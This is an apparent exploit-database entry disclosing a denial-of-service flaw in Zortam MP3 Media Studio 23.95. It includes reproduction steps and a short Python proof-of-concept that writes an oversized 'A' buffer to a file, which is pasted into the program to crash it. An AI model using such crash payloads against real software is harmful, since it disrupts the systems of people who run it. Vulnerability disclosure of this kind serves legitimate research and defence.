header-logo
Suggest Exploit
vendor:
Zortam MP3 Media Studio
by:
Gionathan "John" Reale
7.5
CVSS
HIGH
Denial of Service
CWE
Product Name: Zortam MP3 Media Studio
Affected Version From: 23.95
Affected Version To: 23.95
Patch Exists: NO
Related CWE:
CPE: a:zortam:zortam_mp3_media_studio:23.95
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 x64
2018

Zortam MP3 Media Studio 23.95 – Denial of Service (PoC)

The Zortam MP3 Media Studio 23.95 software is vulnerable to a denial of service attack. By providing a specially crafted payload, an attacker can cause the software to crash.

Mitigation:

There is currently no official patch or mitigation available for this vulnerability. It is recommended to avoid opening untrusted files or content in the Zortam MP3 Media Studio software.
Source

Exploit-DB raw data:

# Exploit Title: Zortam MP3 Media Studio 23.95 - Denial of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-08-19
# Homepage: https://www.zortam.com
# Software Link: https://www.zortam.com/download.html
# Tested Version: 23.95
# Tested on OS: Windows 7 x64
# Steps to Reproduce: Run the python exploit script, it will create a new 
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. Once inside of the program click "Continue". In the new window paste the content of 
# "exploit.txt" into the following field: "Select". Click "Ok" and you will see a crash.

#!/usr/bin/python
   
buffer = "A" * 2000

payload = buffer
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"